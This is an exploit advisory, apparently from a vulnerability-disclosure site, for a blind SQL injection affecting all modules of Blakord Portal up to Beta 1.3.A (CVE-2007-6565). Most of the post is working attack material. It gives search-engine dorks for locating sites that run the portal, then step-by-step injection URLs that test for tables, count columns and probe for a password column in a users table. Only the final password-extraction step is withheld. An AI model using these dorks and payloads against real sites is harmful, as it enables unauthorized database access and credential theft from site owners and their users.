Bug: Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection ( Ascii Version )

Search:
WLB2

Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection

Published
Credit
Risk
2007.12.28
JosS
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2007-6565
No
Yes
 Dork: "Power by Blakord Portal"

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection.

[+] Info:

[~] Software: Blakord Portal

[~] HomePage: http://www.cdv3k.com

[~] Exploit: Blind Sql Injection [High]

[~] Where: All Modules

[~] Bug Found By: JosS / Jose Luis Góngora Fernández

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com

[~] Dork: "Power by Blakord Portal"

[~] Dork2: "Powered by Blakord Portal"

[~] Dork3: "Blakord Portal"

[+] Compression:

[~] True: http://localhost/[path]/[any module]?id=1 and 1=1

[~] False: http://localhost/[path]/[any module]?id=1 and 1=2

[+] Exploding:

[*] Checking table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0

[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])

[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0

[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)

[~] If you don't see any error, it is tha table exist.

[*] Checking columns number of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]

[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6

[~] If you don't see any error, the table has 6 columns.

[*] Checking columns of table:

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0

[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0

[~] If you don't see any error, the column exists.

[*] Admin Password; Noob or Lammer?:

[~] Exploit: Priv8

[~] Example: Priv8

[~] Priv8 , xD.

[+] [The End]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version